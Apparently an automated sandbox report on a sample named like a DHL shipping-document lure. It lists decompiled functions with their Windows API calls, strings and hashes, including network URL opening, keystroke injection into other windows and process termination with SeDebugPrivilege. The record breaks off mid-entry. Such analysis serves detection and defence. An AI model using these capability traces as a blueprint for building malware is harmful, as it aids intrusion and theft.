Instruction Fuzzy Hash: 65619872904BD0AFDB25AFB6AC95A6E7BE9EF12720F04416DF80197282D7319D0287D0

Function 001C8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00206890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002068A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002068B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002068D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002068F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001C8874,00000000,00000000,00000000,000000FF,00000000), ref: 00206901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0020691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001C8874,00000000,00000000,00000000,000000FF,00000000), ref: 0020692D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 7efe0e96d95a9bdda34cd85ff29ce0deb288df7d859e9b30ad902be6547de55e
Instruction ID: c79766a7a59a2e5de46d3c5623e713e3d79385858b19b39b82748e22eeb752dd
Opcode Fuzzy Hash: 7efe0e96d95a9bdda34cd85ff29ce0deb288df7d859e9b30ad902be6547de55e
Instruction Fuzzy Hash: 3151677461030AAFDB248F28DC99FAA7BB5EB68750F104518F906972E0DB70EDA0DB50

Function 0022C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0022C182
GetLastError.KERNEL32 ref: 0022C195
SetEvent.KERNEL32(?), ref: 0022C1A9

Part of subcall function 0022C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0022C272
Part of subcall function 0022C253: GetLastError.KERNEL32 ref: 0022C322
Part of subcall function 0022C253: SetEvent.KERNEL32(?), ref: 0022C336
Part of subcall function 0022C253: InternetCloseHandle.WININET(00000000), ref: 0022C341

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: f746b87357040ae6cf16cd9ee5dfd8f81f740ab5a19bffbfcae2a48602dd4575
Instruction ID: 4e4faa33bd0ee99fcea85604f74e43310bc9d6f4efe8c933af47d59bc3963232
Opcode Fuzzy Hash: f746b87357040ae6cf16cd9ee5dfd8f81f740ab5a19bffbfcae2a48602dd4575
Instruction Fuzzy Hash: 3A319E75111611FFDB219FE9EC08A6ABBE8FF19300B20451EF95A87610DB71E8209BA0

Function 002125A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00213A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00213A57
Part of subcall function 00213A3D: GetCurrentThreadId.KERNEL32 ref: 00213A5E
Part of subcall function 00213A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002125B3), ref: 00213A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002125BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002125DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002125DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002125E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00212601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00212605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0021260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00212623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00212627

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 8492247df2b614395b7fd3ba8b6571a08818850390aae1db28442ded768b4df0
Instruction ID: 8670764812d8aadf08e8796a52254f4cdd5569b2a8e19ee2ddc8472891ad39d6
Opcode Fuzzy Hash: 8492247df2b614395b7fd3ba8b6571a08818850390aae1db28442ded768b4df0
Instruction Fuzzy Hash: EF01D830791650BBFB1067689C8EF993F9DDF9EB11F200011F31CAE0D1C9E114548EA9

Function 00211803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00211449,?,?,00000000), ref: 0021180C
HeapAlloc.KERNEL32(00000000,?,00211449,?,?,00000000), ref: 00211813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00211449,?,?,00000000), ref: 00211828
GetCurrentProcess.KERNEL32(?,00000000,?,00211449,?,?,00000000), ref: 00211830
DuplicateHandle.KERNEL32(00000000,?,00211449,?,?,00000000), ref: 00211833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00211449,?,?,00000000), ref: 00211843
GetCurrentProcess.KERNEL32(00211449,00000000,?,00211449,?,?,00000000), ref: 0021184B
DuplicateHandle.KERNEL32(00000000,?,00211449,?,?,00000000), ref: 0021184E
CreateThread.KERNEL32(00000000,00000000,00211874,00000000,00000000,00000000), ref: 00211868

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 77fef418269eb32d0043ec0e1526daf85c0fdf40414552542f7ae1e47fecb40d
Instruction ID: c8c188af9f18068410a5f04eaa3ec97e857529c2deb01aaed03dbcbf6ff2349f
Opcode Fuzzy Hash: 77fef418269eb32d0043ec0e1526daf85c0fdf40414552542f7ae1e47fecb40d
Instruction Fuzzy Hash: 1301BF75241304BFE750AFA9EC4DF573BACEB8AB11F114411FA09DB191C6709810CB20

Function 0023A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0021D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0021D501
Part of subcall function 0021D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0021D50F
Part of subcall function 0021D4DC: CloseHandle.KERNEL32(00000000), ref: 0021D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0023A16D
GetLastError.KERNEL32 ref: 0023A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0023A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0023A268
GetLastError.KERNEL32(00000000), ref: 0023A273
CloseHandle.KERNEL32(00000000), ref: 0023A2C4

Strings

SeDebugPrivilege, xrefs: 0023A18F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ac9894684f02e14948ad5ad176c9810214fb3ff91a6c7fcaa98628723c6f5a0d
Instruction ID: 2911516588e583c0a413bff8867252afe475c799f748e3adc490402c93024448
Opcode Fuzzy Hash: ac9894684f02e14948ad5ad176c9810214fb3ff91a6c7fcaa98628723c6f5a0d
Instruction Fuzzy Hash: 5F61B2742142429FD720DF18C494F66BBE1AF54318F18849CF8AA8B7A3C776EC55CB92

Function 00243886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00243925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0024393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00243954
_wcslen.LIBCMT ref: 00243999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002439C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002439F4

Strings

SysListView32, xrefs: 002438F7

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 5e43e060364582cee46be866e0d97a782bee539408c81bf6cf81b542b1cae49d
Instruction ID: 5fe5b5696987195ce83fcb5d9b300cb03b2008438e994d11e399c754490c2df4
Opcode Fuzzy Hash: 5e43e060364582cee46be866e0d97a782bee539408c81bf6cf81b542b1cae49d
Instruction Fuzzy Hash: 8941D571A10219ABEF25DF64CC49FEA7BA9EF48350F100526F958E7281D7B19DA0CB90

Function 0021BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0021BCFD
IsMenu.USER32(00000000), ref: 0021BD1D
CreatePopupMenu.USER32 ref: 0021BD53
GetMenuItemCount.USER32(00EF5D10), ref: 0021BDA4
InsertMenuItemW.USER32(00EF5D10,?,00000001,00000030), ref: 0021BDCC

Strings

0, xrefs: 0021BCA8
2, xrefs: 0021BD37

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 60b17d8eea2dab51244508b13612807961ee3611eb6bc55ccc25b439fefb4f95
Instruction ID: be9c64af493d05ef6560b951d34ad79be8ff2117aee1805cf96f5f206ec4b74a
Opcode Fuzzy Hash: 60b17d8eea2dab51244508b13612807961ee3611eb6bc55ccc25b439fefb4f95
Instruction Fuzzy Hash: EB51C47061020ADBDF1ACFA8E8C8BEDBBF4BF65314F244169E411E7290D7709991CB51

Function 002481DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0020F3AB,00000000,?,?,00000000,?,0020682C,00000004,00000000,00000000), ref: 0024824C
EnableWindow.USER32(00000000,00000000), ref: 00248272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002482D1
ShowWindow.USER32(00000000,00000004), ref: 002482E5
EnableWindow.USER32(00000000,00000001), ref: 0024830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0024832F

Strings

8], xrefs: 00248206, 00248252, 00248299, 002482D7, 002482EB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: 8]
API String ID: 642888154-438778366
Opcode ID: 3e0526ea523562aa74f2424af7c655c500c6249d901ac725db0ed061008523c4
Instruction ID: abbe6a6e2b2d0cf9ff950ac0257b715e174685c91bf52a0e781adec3476525dd
Opcode Fuzzy Hash: 3e0526ea523562aa74f2424af7c655c500c6249d901ac725db0ed061008523c4
Instruction Fuzzy Hash: 0741C834622645AFDB1ACF14D899BE87BE4FB46714F1841A9E9084F2B2CB71AC61CF50

Function 0021C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0021C913

Strings

question, xrefs: 0021C8CC
info, xrefs: 0021C8B4
stop, xrefs: 0021C8E4
warning, xrefs: 0021C8FC
blank, xrefs: 0021C895

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a1905cbd398cf661b782866aeff96566757462a374109dfa7070f89421e7bf65
Instruction ID: 6af9bd791ced0b49130d2266d41dc03ec1e1b07ee5b48597cca25cc62cfbdca2
Opcode Fuzzy Hash: a1905cbd398cf661b782866aeff96566757462a374109dfa7070f89421e7bf65
Instruction Fuzzy Hash: 8F11F6396E9707BBA7055B549CC39EE67DCDF36364B30402BF504AB282D7B05D905268

Function 0021ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0021ED2A
_wcslen.LIBCMT ref: 0021ED3B
_wcslen.LIBCMT ref: 0021ED79
_wcslen.LIBCMT ref: 0021EDAF
_wcslen.LIBCMT ref: 0021EDDF
_wcslen.LIBCMT ref: 0021EDEF
_wcslen.LIBCMT ref: 0021EE2B
_wcslen.LIBCMT ref: 0021EE5A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 95b66c20a345bc005e15b6d24dbc4d572b0327fc4504ee7779d6b565bd1f1f60
Instruction ID: 823afe20410007e5a3742782b5d599f338cb687a311cc4aaba410fad5df793a4
Opcode Fuzzy Hash: 95b66c20a345bc005e15b6d24dbc4d572b0327fc4504ee7779d6b565bd1f1f60
Instruction Fuzzy Hash: 7D418065C1021876CB11EBB48C8AACFB7ACAF65710F508463F918E3221FB34E295C7E5

Function 001CF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0020682C,00000004,00000000,00000000), ref: 001CF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0020682C,00000004,00000000,00000000), ref: 0020F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0020682C,00000004,00000000,00000000), ref: 0020F454

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f91b784d93fcd8f3a218fff9e8088229af1cb399e88036c3111a01c6a030095d
Instruction ID: aa1ee2e9068f532d63faca9adaf679b4f4c36c665c30262e443408eb368cf8a4
Opcode Fuzzy Hash: f91b784d93fcd8f3a218fff9e8088229af1cb399e88036c3111a01c6a030095d
Instruction Fuzzy Hash: 76412B35224780BBCFB89B2C998CF2A7B97AB66318F15403CF547569A1C735E882CB11

Function 00242D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00242D1B
GetDC.USER32(00000000), ref: 00242D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00242D2E
ReleaseDC.USER32(00000000,00000000), ref: 00242D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00242D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00242D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00245A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00242DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00242DE1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 81b6b72d9a61a72539de74ed303be23878ab782697ed7ec806ea84fcda083548
Instruction ID: 8a06d5c5b4e6a0c2069fc0bed7ac5847f965522735a27d950869ab625d5b7451
Opcode Fuzzy Hash: 81b6b72d9a61a72539de74ed303be23878ab782697ed7ec806ea84fcda083548
Instruction Fuzzy Hash: 2E31CE76212210BFEB258F55DC8AFEB3FADEF4A711F044055FE089A291C6B58C50CBA0

Function 00215622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00215637
_memcmp.LIBVCRUNTIME ref: 00215659
_memcmp.LIBVCRUNTIME ref: 00215671
_memcmp.LIBVCRUNTIME ref: 00215684
_memcmp.LIBVCRUNTIME ref: 0021569E
_memcmp.LIBVCRUNTIME ref: 002156B1
_memcmp.LIBVCRUNTIME ref: 002156C9
_memcmp.LIBVCRUNTIME ref: 002156E4

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 06681c7a8174d117d866cb374d7f91c3ab576155d7dc2df0487d0dfaf45aa243
Instruction ID: c33331b0bcfcb911c9fb800ce9d75beb0ffe631a610018b6c9b3a28f2e426306
Opcode Fuzzy Hash: 06681c7a8174d117d866cb374d7f91c3ab576155d7dc2df0487d0dfaf45aa243
Instruction Fuzzy Hash: 1D21FC6167092AFBD21899118E82FFA73DDBFF2394F440062FD045A682F760ED7181E5

Function 00234FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00235007
NULL Pointer assignment, xrefs: 0023502E, 00235383

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: eb62f4d3d2153bee12edbdf457a11c0e96c3b926e4a03ba03f5143f811fc7632
Instruction ID: 9d292ea1bee746d222b5a9a6ee50a44443076c3475ff17cdb0d8fc6fe9eadcb8
Opcode Fuzzy Hash: eb62f4d3d2153bee12edbdf457a11c0e96c3b926e4a03ba03f5143f811fc7632
Instruction Fuzzy Hash: 9ED1D3B1A1061A9FDF14CFA8C880FAEB7B5FF48344F148069E919AB281E771DD51CB90

Function 001F1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 001F15CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001F1651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001F16E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001F16FB

Part of subcall function 001E3820: RtlAllocateHeap.NTDLL(00000000,?,00281444,?,001CFDF5,?,?,001BA976,00000010,00281440,001B13FC,?,001B13C6,?,001B1129), ref: 001E3852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001F1777
__freea.LIBCMT ref: 001F17A2
__freea.LIBCMT ref: 001F17AE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 98387d1eb3a1cb264be7d3d54c401514f67d96d1ca89fe51fe280ac0ade15752
Instruction ID: 6858600090b3e485cd7630cbd67c8b57043948bd7b09b956211e8e41774dba25
Opcode Fuzzy Hash: 98387d1eb3a1cb264be7d3d54c401514f67d96d1ca89fe51fe280ac0ade15752
Instruction Fuzzy Hash: 4991D472E0021EFADF249EB5C881AFE7BB5AF5A710F180659EA06E7150DB35DC40CB60

Function 00234523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00234648
VariantInit.OLEAUT32(?), ref: 00234749
VariantClear.OLEAUT32(?), ref: 00234753
VariantClear.OLEAUT32(?), ref: 002347B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0023472C
Null Object assignment in FOR..IN loop, xrefs: 002345D8, 00234706, 002347BE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
